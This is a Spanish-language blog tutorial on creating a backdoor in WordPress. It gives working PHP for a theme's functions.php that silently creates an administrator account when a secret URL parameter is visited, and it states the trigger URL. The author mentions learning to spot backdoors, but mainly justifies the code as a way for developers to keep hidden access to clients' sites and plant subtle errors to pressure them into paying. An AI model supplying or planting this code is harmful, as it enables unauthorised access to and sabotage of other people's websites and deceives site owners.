En este tutorial vamos a aprender a crear un backdoor… si como lo prometí la semana pasada hoy nos toca crear un backdoor, muchas personas se pueden asustar con la palabra backdoor “dijo nadie nunca”, bueno sí, un poco la verdad.
Pasos para crear el backdoor en WordPress
- Crear una función en el archivo de functions.php
- Entramos en la opción de apariencia > editor de temas > functions.php
- Copiamos y pegamos la siguiente función (Asegúrate que cuando lo peges, cambies las comillas dobles por las simples):
- function my_backdoor() {
if ($_GET[‘backdoor’] == ‘crea’) {
require(‘wp-includes/registration.php’);
if (!username_exists(‘backdoor’)) {
$user_id = wp_create_user(‘backdoor’, ‘my-password’);
$user = new WP_User($user_id);
$user->set_role(‘administrator’);
echo ‘Puerta trasera creada’;
die();
}
}
}
add_action( ‘wp_head’, ‘my_backdoor’ ); - Cambiar ‘my-password’ por su propia contraseña y puedes dejar ‘backdoor’ que es el nombre que se le registrara al usuario creado.
- El URL que tienen que usar después de pegar el código anterior es: .com/?backdoor=crea
- function my_backdoor() {
Seamos honestos, la intención de crear un backdoor la mayoría de las veces para entrar a un sitio sin permiso ¿verdad? Espero que no lo usen para eso, pero hay dos principales motivos por los cuales se me ocurrió hacer este tutorial.
Saber como identificar un backdoor en WordPress
Así funciona la mayoría de los ataques, por medio de un backdoor, por algún plugin vulnerable o de alguna herramienta gratuita de internet que bajaste sin licencia por querer ahorrarte algunos morlacos y resulta que al día siguiente tienes doscientas mil páginas indexados con caracteres chinos y publicidad de carros y prostitutas. Entonces esa es la primera razón por la que yo veo que ustedes deben aprender esto.
Otra razón que veo para el uso de esta función…
Vamos suponer que uno de tus clientes te pide un sitio, lo armas todo bonito y ya te pagó la mitad y para activar el sitio le pides la segunda mitad… pero es un cliente muy necio que quiere verlo ya activo y tu no confías mucho en él y el cliente sale con “Cuando me lo actives, será entonces ya cuando este lista la página y entonces es cuando yo te pague el proyecto, porque ahorita no está lista y no la tienes en un dominio.”
Entonces ahí es cuando justifico el uso de un backdoor.
Así, si el día mañana el cliente cambio contraseña y no tienes accesos al servidor, pues tienes el acceso con el backdor… Y no con la intención de poner por una foto del negro de whatsapp, pero si poner un errorcito muy sutil, que sea molestó pero que no afecte las funcionalidades del sitio, para que el cliente te tenga que buscar y ahí es donde dices “eh muchacho no me has liquidado”.
Solo eso se necesita, haz la prueba, registra el usuario e inicia sesión.
Te sugiero que seas buena onda y el código dejarlo bien obvio con algún comentario de “al nuevo administrador del sitio, estos clientes no pagan, te maltratan, etc” para que el próximo desarrollador que le toque trabajar no batalle con eso.
Independientemente si se crea un backdoor, si no te sabes el url del login, no podras tener acceso, por eso te recomiendo que siempre que tu sitio salga a producción le cambiar URL del login de wordpress.
